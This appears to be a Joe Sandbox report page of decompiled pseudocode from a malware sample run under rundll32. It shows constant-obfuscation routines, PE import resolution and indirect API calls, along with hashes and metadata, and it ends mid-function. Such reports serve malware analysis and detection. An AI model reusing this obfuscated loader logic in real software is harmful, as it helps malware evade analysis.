                                                                                                                      				_v28 = _v28 ^ 0xc2551a85;
                                                                                                                      				_t135 =  *0x6a3e0c; // 0x0
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0x4903f33) {
                                                                                                                      						if(_t146 == 0x6f617aa) {
                                                                                                                      							_t128 = E006846BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E006881B7, _v28);
                                                                                                                      							_t135 =  *0x6a3e0c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 != 0xc69f0b3) {
                                                                                                                      								goto L6;
                                                                                                                      							} else {
                                                                                                                      								_t131 = E00687AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
                                                                                                                      								_t135 =  *0x6a3e0c; // 0x0
                                                                                                                      								_t148 =  &(_t148[6]);
                                                                                                                      								_t146 = 0x6f617aa;
                                                                                                                      								 *((intOrPtr*)(_t135 + 8)) = _t131;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L9:
                                                                                                                      						return 0 | _t135 != 0x00000000;
                                                                                                                      					}
                                                                                                                      					_push(_t135);
                                                                                                                      					_push(_t135);
                                                                                                                      					_t143 = 0x24;
                                                                                                                      					_t135 = E00687FF2(_t143);
                                                                                                                      					_t146 = 0xc69f0b3;
                                                                                                                      					 *0x6a3e0c = _t135;
                                                                                                                      					L6:
                                                                                                                      				} while (_t146 != 0xab42793);
                                                                                                                      				goto L9;
                                                                                                                      			}
























                                                                                                                      0x0068e10d
                                                                                                                      0x0068e112
                                                                                                                      0x0068e11a
                                                                                                                      0x0068e122
                                                                                                                      0x0068e12a
                                                                                                                      0x0068e132
                                                                                                                      0x0068e137
                                                                                                                      0x0068e13f
                                                                                                                      0x0068e147
                                                                                                                      0x0068e14f
                                                                                                                      0x0068e154
                                                                                                                      0x0068e15c
                                                                                                                      0x0068e164
                                                                                                                      0x0068e16e
                                                                                                                      0x0068e177
                                                                                                                      0x0068e17b
                                                                                                                      0x0068e183
                                                                                                                      0x0068e18b
                                                                                                                      0x0068e195
                                                                                                                      0x0068e199
                                                                                                                      0x0068e1a1
                                                                                                                      0x0068e1a7
                                                                                                                      0x0068e1a7
                                                                                                                      0x0068e1ad
                                                                                                                      0x0068e229
                                                                                                                      0x0068e22e
                                                                                                                      0x0068e237
                                                                                                                      0x0068e1af
                                                                                                                      0x0068e1b1
                                                                                                                      0x00000000
                                                                                                                      0x0068e1b3
                                                                                                                      0x0068e1c6
                                                                                                                      0x0068e1cb
                                                                                                                      0x0068e1d1
                                                                                                                      0x0068e1d4
                                                                                                                      0x0068e1d6
                                                                                                                      0x00000000
                                                                                                                      0x0068e1d6
                                                                                                                      0x0068e1b1
                                                                                                                      0x0068e23b
                                                                                                                      0x0068e248
                                                                                                                      0x0068e248
                                                                                                                      0x0068e1e7
                                                                                                                      0x0068e1e8
                                                                                                                      0x0068e1eb
                                                                                                                      0x0068e1f3
                                                                                                                      0x0068e1f5
                                                                                                                      0x0068e1f7
                                                                                                                      0x0068e1fd
                                                                                                                      0x0068e1fd
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (F$"
                                                                                                                      • API String ID: 0-1034852068
                                                                                                                      • Opcode ID: d05dfb3c583b544acb3fb8745088e7a7b539c27a426c58cf5bf8006a3e423e59
                                                                                                                      • Instruction ID: 0da1dd74783decf1b569f9a57fe1e333b0c00c82fef159b9257d7436544658fe
                                                                                                                      • Opcode Fuzzy Hash: d05dfb3c583b544acb3fb8745088e7a7b539c27a426c58cf5bf8006a3e423e59
                                                                                                                      • Instruction Fuzzy Hash: 325153714093019FC348DF25D98A80FBBE1FB84758F108A1DF595A6260D7B1DA09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E00687C37(void* __ecx, void* __edx) {
                                                                                                                      				void* _t91;
                                                                                                                      				void* _t102;
                                                                                                                      				signed short _t108;
                                                                                                                      				signed short _t111;
                                                                                                                      				signed short _t113;
                                                                                                                      				signed int _t115;
                                                                                                                      				signed int _t116;
                                                                                                                      				signed int _t117;
                                                                                                                      				signed short _t121;
                                                                                                                      				intOrPtr _t128;
                                                                                                                      				signed short* _t132;
                                                                                                                      				signed short _t133;
                                                                                                                      				intOrPtr _t134;
                                                                                                                      				void* _t135;
                                                                                                                      				void* _t136;
                                                                                                                      
                                                                                                                      				_t134 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                      				_push(_t134);
                                                                                                                      				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                      				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t91);
                                                                                                                      				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
                                                                                                                      				_t136 = _t135 + 0x14;
                                                                                                                      				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
                                                                                                                      				_t115 = 0x47;
                                                                                                                      				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
                                                                                                                      				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
                                                                                                                      				 *(_t136 + 0x28) = 0x411077;
                                                                                                                      				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
                                                                                                                      				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
                                                                                                                      				 *(_t136 + 0x14) = 0x6ab109;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
                                                                                                                      				 *(_t136 + 0x3c) = 0x583f0;
                                                                                                                      				_t116 = 0x13;
                                                                                                                      				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
                                                                                                                      				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
                                                                                                                      				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
                                                                                                                      				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
                                                                                                                      				 *(_t136 + 0x28) = 0xeb6063;
                                                                                                                      				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
                                                                                                                      				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
                                                                                                                      				 *(_t136 + 0x20) = 0x8f08a1;
                                                                                                                      				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
                                                                                                                      				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
                                                                                                                      				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
                                                                                                                      				 *(_t136 + 0x1c) = 0x46d0e7;
                                                                                                                      				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
                                                                                                                      				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
                                                                                                                      				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
                                                                                                                      				 *(_t136 + 0x14) = 0x9e0f5b;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
                                                                                                                      				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
                                                                                                                      				_t117 =  *(_t136 + 0x18);
                                                                                                                      				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                      				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                      				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                      					L13:
                                                                                                                      					return 1;
                                                                                                                      				} else {
                                                                                                                      					_t133 = _t128 + _t134;
                                                                                                                      					while(1) {
                                                                                                                      						_t105 =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                      						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      						_t121 = E0069CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
                                                                                                                      						 *(_t136 + 0x18) = _t121;
                                                                                                                      						__eflags = _t121;
                                                                                                                      						if(_t121 == 0) {
                                                                                                                      							L15:
                                                                                                                      							return 0;
                                                                                                                      						}
                                                                                                                      						_t132 =  *_t133 + _t134;
                                                                                                                      						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
                                                                                                                      						while(1) {
                                                                                                                      							_t108 =  *_t132;
                                                                                                                      							__eflags = _t108;
                                                                                                                      							if(__eflags == 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(__eflags >= 0) {
                                                                                                                      								_t110 = _t108 + 2 + _t134;
                                                                                                                      								__eflags = _t108 + 2 + _t134;
                                                                                                                      							} else {
                                                                                                                      								_t110 = _t108 & 0x0000ffff;
                                                                                                                      							}
                                                                                                                      							_t111 = E00686CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
                                                                                                                      							_t136 = _t136 + 0x10;
                                                                                                                      							__eflags = _t111;
                                                                                                                      							if(_t111 == 0) {
                                                                                                                      								goto L15;
                                                                                                                      							} else {
                                                                                                                      								_t121 =  *(_t136 + 0x18);
                                                                                                                      								_t132 =  &(_t132[2]);
                                                                                                                      								 *_t113 = _t111;
                                                                                                                      								_t113 = _t113 + 4;
                                                                                                                      								__eflags = _t113;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t133 = _t133 + 0x14;
                                                                                                                      						__eflags = _t133;
                                                                                                                      					}
                                                                                                                      					goto L13;
                                                                                                                      				}
                                                                                                                      			}


















                                                                                                                      0x00687d4e
                                                                                                                      0x00687d56
                                                                                                                      0x00687d5b
                                                                                                                      0x00687d66
                                                                                                                      0x00687d6a
                                                                                                                      0x00687d6c
                                                                                                                      0x00687d72
                                                                                                                      0x00687df1
                                                                                                                      0x00000000
                                                                                                                      0x00687d7b
                                                                                                                      0x00687d7b
                                                                                                                      0x00687dea
                                                                                                                      0x00687dea
                                                                                                                      0x00687def
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00687d96
                                                                                                                      0x00687d98
                                                                                                                      0x00687d9c
                                                                                                                      0x00687d9e
                                                                                                                      0x00687dfc
                                                                                                                      0x00000000
                                                                                                                      0x00687dfc
                                                                                                                      0x00687da5
                                                                                                                      0x00687da7
                                                                                                                      0x00687de1
                                                                                                                      0x00687de1
                                                                                                                      0x00687de3
                                                                                                                      0x00687de5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00687dab
                                                                                                                      0x00687db5
                                                                                                                      0x00687db5
                                                                                                                      0x00687dad
                                                                                                                      0x00687dad
                                                                                                                      0x00687dad
                                                                                                                      0x00687dc9
                                                                                                                      0x00687dce
                                                                                                                      0x00687dd1
                                                                                                                      0x00687dd3
                                                                                                                      0x00000000
                                                                                                                      0x00687dd5
                                                                                                                      0x00687dd5
                                                                                                                      0x00687dd9
                                                                                                                      0x00687ddc
                                                                                                                      0x00687dde
                                                                                                                      0x00687dde
                                                                                                                      0x00000000
                                                                                                                      0x00687dde
                                                                                                                      0x00687dd3
                                                                                                                      0x00687de7
                                                                                                                      0x00687de7
                                                                                                                      0x00687de7
                                                                                                                      0x00000000
                                                                                                                      0x00687dea

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: X^wE$c`
                                                                                                                      • API String ID: 0-1321574684
                                                                                                                      • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                      • Instruction ID: cfa84dce28b7a05a5f2d9f38693a653e06f348ece6b9601071de82a4e39dee1f
                                                                                                                      • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                      • Instruction Fuzzy Hash: F15187715083029FC758EF24D88692BBBE2FFC4358F60491DF48696221D3B1DA49CF96
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 62%
                                                                                                                      			E00684C5D(intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t106;
                                                                                                                      				void* _t108;
                                                                                                                      				intOrPtr* _t109;
                                                                                                                      				signed int _t112;
                                                                                                                      				signed int _t113;
                                                                                                                      				signed int _t114;
                                                                                                                      				intOrPtr _t128;
                                                                                                                      
                                                                                                                      				_v44 = _v44 & 0x00000000;
                                                                                                                      				_v48 = 0xad4f7a;
                                                                                                                      				_v16 = 0xf18dbd;
                                                                                                                      				_v16 = _v16 + 0xffff4795;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 >> 6;
                                                                                                                      				_v16 = _v16 ^ 0x00dff17e;
                                                                                                                      				_v12 = 0xaf5949;
                                                                                                                      				_v12 = _v12 | 0xe2d389df;
                                                                                                                      				_v12 = _v12 + 0x286;
                                                                                                                      				_t112 = 3;
                                                                                                                      				_v12 = _v12 / _t112;
                                                                                                                      				_v12 = _v12 ^ 0x4ba32b72;
                                                                                                                      				_v24 = 0x2aefd1;
                                                                                                                      				_t113 = 0x7d;
                                                                                                                      				_t128 = _a4;
                                                                                                                      				_v24 = _v24 * 0x59;
                                                                                                                      				_v24 = _v24 << 2;
                                                                                                                      				_v24 = _v24 ^ 0x3bb9ca43;
                                                                                                                      				_v8 = 0x985427;
                                                                                                                      				_v8 = _v8 << 2;
                                                                                                                      				_v8 = _v8 ^ 0x713a2c3c;
                                                                                                                      				_v8 = _v8 | 0x45eb1ca3;
                                                                                                                      				_v8 = _v8 ^ 0x77f5f6d4;
                                                                                                                      				_v28 = 0xa7f2b4;
                                                                                                                      				_v28 = _v28 >> 0xc;
                                                                                                                      				_v28 = _v28 + 0x7e4a;
                                                                                                                      				_v28 = _v28 ^ 0x000cc7a8;
                                                                                                                      				_v40 = 0x7087c6;
                                                                                                                      				_t114 = 0x69;
                                                                                                                      				_v40 = _v40 / _t113;
                                                                                                                      				_v40 = _v40 ^ 0x00014835;
                                                                                                                      				_v20 = 0xcde00b;
                                                                                                                      				_v20 = _v20 + 0xffffcf30;
                                                                                                                      				_v20 = _v20 | 0xcdf6f1c4;
                                                                                                                      				_v20 = _v20 + 0xfc2b;
                                                                                                                      				_v20 = _v20 ^ 0xce0272c5;
                                                                                                                      				_v36 = 0x30875a;
                                                                                                                      				_v36 = _v36 * 0x47;
                                                                                                                      				_v36 = _v36 / _t114;
                                                                                                                      				_v36 = _v36 ^ 0x0028facf;
                                                                                                                      				_v32 = 0x6c449b;
                                                                                                                      				_v32 = _v32 >> 0xf;
                                                                                                                      				_v32 = _v32 + 0xffff12fc;
                                                                                                                      				_v32 = _v32 ^ 0xfff19483;
                                                                                                                      				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
                                                                                                                      				_t134 = _t106;
                                                                                                                      				if(_t106 != 0) {
                                                                                                                      					_push(_v8);
                                                                                                                      					_push(_v24);
                                                                                                                      					_push(_v12);
                                                                                                                      					_t108 = E00698606(_v16, 0x681378, _t134);
                                                                                                                      					_push(_v20);
                                                                                                                      					_t130 = _t108;
                                                                                                                      					_push(_t108);
                                                                                                                      					_push(_v40);
                                                                                                                      					_t109 = E0068CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
                                                                                                                      					if(_t109 != 0) {
                                                                                                                      						 *_t109();
                                                                                                                      					}
                                                                                                                      					E0068A8B0(_v36, _t130, _v32);
                                                                                                                      				}
                                                                                                                      				return 0;
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <,:q$J~
                                                                                                                      • API String ID: 0-951887683
                                                                                                                      • Opcode ID: 3ac9c56c6a5d6f89f5b14cd581a333342dad8ce47dcd498e978e92f498ed7df6
                                                                                                                      • Instruction ID: f72c20677c66b8c18dfe16d24bdd405a261bb1c27ac98bad1b59247703f43d91
                                                                                                                      • Opcode Fuzzy Hash: 3ac9c56c6a5d6f89f5b14cd581a333342dad8ce47dcd498e978e92f498ed7df6
                                                                                                                      • Instruction Fuzzy Hash: EF411F71D0130AABDF48DFA1C94A6EEBBB2FF54314F208159D400BA2A0DBB50B55CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0068EE81(void* __eflags) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				char _v44;
                                                                                                                      				short _v48;
                                                                                                                      				short _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				char _v576;
                                                                                                                      				intOrPtr* _t95;
                                                                                                                      				signed int _t99;
                                                                                                                      				signed int _t100;
                                                                                                                      
                                                                                                                      				_v56 = 0x3b8b1c;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_v52 = 0;
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v8 = 0xf9e323;
                                                                                                                      				_v8 = _v8 ^ 0x73816ffa;
                                                                                                                      				_v8 = _v8 + 0x5b26;
                                                                                                                      				_v8 = _v8 ^ 0x387262e7;
                                                                                                                      				_v8 = _v8 ^ 0x4b076809;
                                                                                                                      				_v20 = 0x75aab0;
                                                                                                                      				_v20 = _v20 ^ 0xc40c30fa;
                                                                                                                      				_v20 = _v20 + 0x78e9;
                                                                                                                      				_v20 = _v20 ^ 0xc4737271;
                                                                                                                      				_v16 = 0xa8e87a;
                                                                                                                      				_v16 = _v16 + 0xffff799a;
                                                                                                                      				_t99 = 0x33;
                                                                                                                      				_v16 = _v16 / _t99;
                                                                                                                      				_v16 = _v16 ^ 0x000fed3f;
                                                                                                                      				_v28 = 0x7feeb5;
                                                                                                                      				_v28 = _v28 + 0xffffe4f6;
                                                                                                                      				_v28 = _v28 ^ 0x007d0c9c;
                                                                                                                      				_v32 = 0x59c916;
                                                                                                                      				_t100 = 0x5d;
                                                                                                                      				_v32 = _v32 / _t100;
                                                                                                                      				_v32 = _v32 ^ 0x000d1fec;
                                                                                                                      				_v12 = 0x866588;
                                                                                                                      				_v12 = _v12 ^ 0x68ade4cb;
                                                                                                                      				_v12 = _v12 + 0xffffbaa5;
                                                                                                                      				_v12 = _v12 ^ 0x68223e43;
                                                                                                                      				_v36 = 0xbafac2;
                                                                                                                      				_v36 = _v36 ^ 0x5e34b155;
                                                                                                                      				_v36 = _v36 ^ 0x5e8c811c;
                                                                                                                      				_v24 = 0xc770cb;
                                                                                                                      				_v24 = _v24 >> 0xf;
                                                                                                                      				_v24 = _v24 ^ 0x95635bf4;
                                                                                                                      				_v24 = _v24 ^ 0x956359d7;
                                                                                                                      				_v40 = 0xbd0b83;
                                                                                                                      				_v40 = _v40 >> 3;
                                                                                                                      				_v40 = _v40 ^ 0x001e2563;
                                                                                                                      				_t101 = _v8;
                                                                                                                      				if(E00698F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
                                                                                                                      					_t95 =  &_v576;
                                                                                                                      					if(_v576 != 0) {
                                                                                                                      						while( *_t95 != 0x5c) {
                                                                                                                      							_t95 = _t95 + 2;
                                                                                                                      							if( *_t95 != 0) {
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      							}
                                                                                                                      							goto L6;
                                                                                                                      						}
                                                                                                                      						_t101 = 0;
                                                                                                                      						 *((short*)(_t95 + 2)) = 0;
                                                                                                                      					}
                                                                                                                      					L6:
                                                                                                                      					E0069DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
                                                                                                                      				}
                                                                                                                      				return _v44;
                                                                                                                      			}





















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: C>"h$br8
                                                                                                                      • API String ID: 0-573140060
                                                                                                                      • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                      • Instruction ID: ba7e9a554a5822a6a7f04a57e5e729b9e9206aee004b7f4d586669d8d4171b25
                                                                                                                      • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                      • Instruction Fuzzy Hash: 86410271C0021DEBCF58DFE4C94A5EEBBB5FB04304F20819AE505B6260E3B55A55CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t85;
                                                                                                                      				signed int _t91;
                                                                                                                      
                                                                                                                      				_v40 = _v40 & 0x00000000;
                                                                                                                      				_v48 = 0xea50c7;
                                                                                                                      				_v44 = 0x183406;
                                                                                                                      				_v8 = 0x4cb37c;
                                                                                                                      				_v8 = _v8 + 0xc736;
                                                                                                                      				_v8 = _v8 + 0xd4a7;
                                                                                                                      				_t91 = __edx;
                                                                                                                      				_t85 = 0x64;
                                                                                                                      				_v8 = _v8 * 0x2d;
                                                                                                                      				_v8 = _v8 ^ 0x0dcd94f9;
                                                                                                                      				_v24 = 0x238f3e;
                                                                                                                      				_v24 = _v24 << 3;
                                                                                                                      				_v24 = _v24 ^ 0x011b8be3;
                                                                                                                      				_v20 = 0x73abc8;
                                                                                                                      				_v20 = _v20 >> 3;
                                                                                                                      				_v20 = _v20 ^ 0x00035013;
                                                                                                                      				_v16 = 0x5012b6;
                                                                                                                      				_v16 = _v16 >> 0x10;
                                                                                                                      				_v16 = _v16 / _t85;
                                                                                                                      				_v16 = _v16 ^ 0x000aff4c;
                                                                                                                      				_v12 = 0x8c34bb;
                                                                                                                      				_v12 = _v12 | 0x8c5a3f77;
                                                                                                                      				_v12 = _v12 + 0xffff11fb;
                                                                                                                      				_v12 = _v12 ^ 0x2d4fbea1;
                                                                                                                      				_v12 = _v12 ^ 0xa19c1e56;
                                                                                                                      				_v36 = 0xff820a;
                                                                                                                      				_v36 = _v36 | 0x4fe4a4bc;
                                                                                                                      				_v36 = _v36 ^ 0x4ffdd4f4;
                                                                                                                      				_v32 = 0x36506a;
                                                                                                                      				_v32 = _v32 + 0x4de;
                                                                                                                      				_v32 = _v32 ^ 0x003709b9;
                                                                                                                      				_v28 = 0x64fd3b;
                                                                                                                      				_v28 = _v28 + 0xffff3e7a;
                                                                                                                      				_v28 = _v28 ^ 0x00656766;
                                                                                                                      				if( *((intOrPtr*)(0x6a3210 + __edx * 4)) == 0) {
                                                                                                                      					_t83 = E00690A0E(_t85, _t85, _a4);
                                                                                                                      					_push(_v28);
                                                                                                                      					_push(_a12);
                                                                                                                      					_push(_v32);
                                                                                                                      					_push(_t83);
                                                                                                                      					 *((intOrPtr*)(0x6a3210 + _t91 * 4)) = E0068CDCD(_v12, _v36);
                                                                                                                      				}
                                                                                                                      				return  *((intOrPtr*)(0x6a3210 + _t91 * 4));
                                                                                                                      			}


















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: fge$jP6
                                                                                                                      • API String ID: 0-775479084
                                                                                                                      • Opcode ID: 9c5b6e836d6eed5fb25385116631fb4f12066803a54c304e3c7bbec5116019c9
                                                                                                                      • Instruction ID: e2bdab16d6c067fd5ef1a3bb6d4021dcb5b45026d1ef7fd5f01928a8d6c36dd9
                                                                                                                      • Opcode Fuzzy Hash: 9c5b6e836d6eed5fb25385116631fb4f12066803a54c304e3c7bbec5116019c9
                                                                                                                      • Instruction Fuzzy Hash: B031EEB1C00209EBCF48DFA4CA4A9EEBBB5FB09318F108148E511B6220C3B95B49CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 83%
                                                                                                                      			E006A0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				void* _t61;
                                                                                                                      				intOrPtr _t66;
                                                                                                                      				void* _t73;
                                                                                                                      				intOrPtr* _t74;
                                                                                                                      
                                                                                                                      				_t74 = _a16;
                                                                                                                      				_push(_t74);
                                                                                                                      				_push(_a12);
                                                                                                                      				_t73 = __ecx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t61);
                                                                                                                      				_v16 = 0x2b4f5d;
                                                                                                                      				_v16 = _v16 * 0x1c;
                                                                                                                      				_v16 = _v16 >> 8;
                                                                                                                      				_v16 = _v16 ^ 0x000abada;
                                                                                                                      				_v24 = 0x6f176d;
                                                                                                                      				_v24 = _v24 | 0x8892b5fd;
                                                                                                                      				_v24 = _v24 ^ 0x88fd6dba;
                                                                                                                      				_v12 = 0x9049ef;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x7aa47b64;
                                                                                                                      				_v12 = _v12 ^ 0x7aa68413;
                                                                                                                      				_a16 = 0x9c064;
                                                                                                                      				_a16 = _a16 + 0x4e6a;
